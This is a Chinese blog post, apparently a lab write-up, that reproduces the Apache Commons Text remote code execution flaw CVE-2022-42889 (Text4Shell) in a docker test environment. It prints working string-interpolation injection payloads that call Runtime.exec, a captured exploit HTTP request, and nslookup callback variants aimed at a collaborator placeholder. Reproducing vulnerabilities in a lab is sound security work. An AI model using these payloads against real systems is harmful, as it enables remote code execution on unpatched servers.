Apache Commons Text 任意代码执行漏洞复现(CVE-2022-42889)

最新推荐文章于 2023-03-05 20:56:49 发布
最新推荐文章于 2023-03-05 20:56:49 发布
阅读量3.5k 收藏 2
点赞数 2
分类专栏: 杂项 文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/127439679
版权

目录

漏洞介绍

Apache Commons Text 是一个专注于处理字符串的算法的库。该组件中存在任意代码执行漏洞,若攻击者对StringSubstitutor处理的字符串可控,则可通过该漏洞在受害者机器上执行任意代码。
更详细的介绍参见:https://nox.qianxin.com/vulnerability/detail/QVD-2022-26848

影响范围

1.5<= Apache Commons Text <=1.9

漏洞环境搭建

参见:https://github.com/karthikuj/cve-2022-42889-text4shell-docker
最好一个云服务器,否则docker环境会无法下载下来,下面按照参考的连接来操作。

  1. 下载项目
git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
  1. 下载安装Maven,并编辑jar文件,出现“BUILD SUCCESS”说明编译成功
sudo apt install maven
mvn clean install

在这里插入图片描述

  1. 开始构建docker
docker build --tag=text4shell .
docker images

在这里插入图片描述

  1. 运行docker:docker run -p 80:8080 text4shell

在这里插入图片描述

漏洞复现

访问网站,页面如下:
在这里插入图片描述

使用靶场提供的验证代码:${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch /tmp/foo’)}
在这里插入图片描述

去docker中验证效果,发现果然创建了一个文件。

docker exec -it <container_id> bash
ls /tmp/

在这里插入图片描述

流量包及附件

得到的流量包删除掉pdf后缀:cve-2022-42889.pcap.pdf

GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D HTTP/1.1
Host: 18.143.196.209
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Length: 94
Date: Thu, 20 Oct 2022 08:11:14 GMT

Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

补充

此靶场似乎有些问题。

  1. 根据 https://github.com/SeanWrightSec/CVE-2022-42889-PoC
    得知验证代码可以是${script:javascript:195 + 324},但是此靶场验证失败
  2. 根据 https://github.com/kljunowsky/CVE-2022-42889-text4shell
    得知,验证代码共如下三种,但是这个靶场不能全部支持
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}

${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
lainwith
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
apache-commons-text-simple-tut
05-16
apache-commons-text-simple-tut 来自的Apache公共文本的超简单演示 技术: Apache Commons Text JUnit的
漏洞分析】Apache Commons Text远程代码执行漏洞CVE-2022-42889
olga5abl的博客
11-30 4183
这些查找是:-“script”-使用JVM脚本执行引擎(javax.script)执行表达式-“dns”-解析dns记录-“url”-从url加载值,如果使用不受信任的配置值,则受影响版本中使用插值默认值的应用程序,可能容易受到远程代码执行或与远程服务器无意接触的影响。并且这种插值器的性质意味着,将内容输入到易受攻击的对象中的可能性,比仅与Log4Shell中的此类字符串交互的可能性要小。通常在开发过程中用于占位符和动态获取属性的字符串编辑工具包,常用于数据库查询前的语句替换,或者页面输出时的替换。
commons-text-1.9-API文档-中文版.zip
06-05
赠送jar包:commons-text-1.9.jar; 赠送原API文档:commons-text-1.9-javadoc.jar; 赠送源代码commons-text-1.9-sources.jar; 赠送Maven依赖信息文件:commons-text-1.9.pom; 包含翻译后的API文档:commons-text-1.9-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.apache.commons:commons-text:1.9; 标签:apachecommonstext、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述 CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-databind 2.x before 2.9.10.8 错误处理了序列化小工具和打字之间的交互,与org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS有关。 CVE-2020-36181:FasterXML jackson-databind 2.x before 2.9.10.8 错误处理了序列化小工具和打字之间的交互,与org.apache.tomcat.dbcp.dbcp.cpdsada
CVE-2022-42889 Apache Commons Text RCE漏洞分析
二狗的博客
01-31 1809
最近一直在对刚研发出来的自动化Web/API漏洞Fuzz的命令行扫描工具进行维护更新(工具地址:https://github.com/StarCrossPortal/scalpel),目前扫描工具已更新至第三个版本,新增了5条2022CVE漏洞POC,修复了例如Content-Type和body类型不一致等问题。最新版本测试稳定,满足Web/API的漏洞Fuzz和多场景的漏洞检测,欢迎大家试用。在维护更新扫描器POC库时,笔者看到了这个被称为“Textshell”的CVE漏洞,决定学习分析一波。
[漏洞复现]Text4shellCVE-2022-42889
qq_45751902的博客
11-28 3081
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。 Apache Commons Text版本1.5到1.9中,该问题的根源在于在DNS、脚本和 URL 查找期间执行的字符串替换方式可能导致在传递不受信任的输入时在易受攻击的系统上执行任意代码。 成功利用该漏洞可以使威胁参与者仅通过特制的有效负载打开与易受攻击的应用
CVE-2022-42889 Apache Commons Text 漏洞
王嘟嘟的博客
02-28 923
所幸遇到,就简单看看,其中没有啥比较难的地方,仅做记录。10月13日的漏洞
CVE-2022-42889 Apache Commons Text漏洞复现
热门推荐
leeezp的博客
10-18 27万+
Apache Commons Text 1.5 ~1.9 版本中,攻击者可构造恶意文本,使得Apache Commons Text 在解析时执行任意代码,控制服务器。点一下左侧的箭头,先查看下接口,有很多。在上一步调试跟进看看进了哪个实现类。
Apache Commons Text Library Flaw,CVE-2022-42889
m0_60568198的博客
10-30 285
CVE-2022-42889漏洞
commons-text-1.9-API文档-中英对照版.zip
06-04
赠送jar包:commons-text-1.9.jar; 赠送原API文档:commons-text-1.9-javadoc.jar; 赠送源代码commons-text-1.9-sources.jar; 赠送Maven依赖信息文件:commons-text-1.9.pom; 包含翻译后的API文档:commons-text-1.9-javadoc-API文档-中文(简体)-英语-对照版.zip; Maven坐标:org.apache.commons:commons-text:1.9; 标签:apachecommonstext、中英对照文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。 双语对照,边学技术、边学英语。
shell基本命令
weixin_30757793的博客
09-25 289
一 内置命令 hlep 命令 帮助 help test help -s printf 显示内置命令的语法格式 echo 用来显示一行文字 echo "hello world" 默认会自动换行 echo -n "hello wrold" 不自动换行 echo -e 让字符串中的特殊字符起作用 echo -e "I AM THE King\nof th...
使用 Sublime Text 4 优雅地写C++
feichangyanse的博客
03-05 2762
sublime
CVE-2022-42889 Apache Commons Text远程代码执行漏洞复现
热爱学习,喜欢折腾!
10-18 2814
Apache CommonsApache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。
shell 读取text文本
weixin_42610010的博客
01-05 1570
可以使用以下命令读取 text 文件: cattext.txt 这将会将 text.txt 中的内容全部输出到终端。 如果想要将文件内容赋值给一个变量,可以使用下面的命令: content=$(cat text.txt) 这样,文件内容就会被赋值给变量 content 了。 你也可以使用 sed 命令来读取文件的一部分内容。例如,要获取 text.txt 第 3 行的内容,可以使用如下命令: ...
漏洞通告】CVE-2022-42889 Apache Commons Text远程代码执行漏洞
热爱学习,喜欢折腾!
10-14 3302
10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。
『Java CVECVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2131
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
IPV6探测
LainWith的博客
12-28 1万+
领导提了个问题,怎么找出没实施IPV6的设备或域名,简单整理了一下。
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
最新发布
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修复这个漏洞的补丁程序,建议用户尽快升级到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值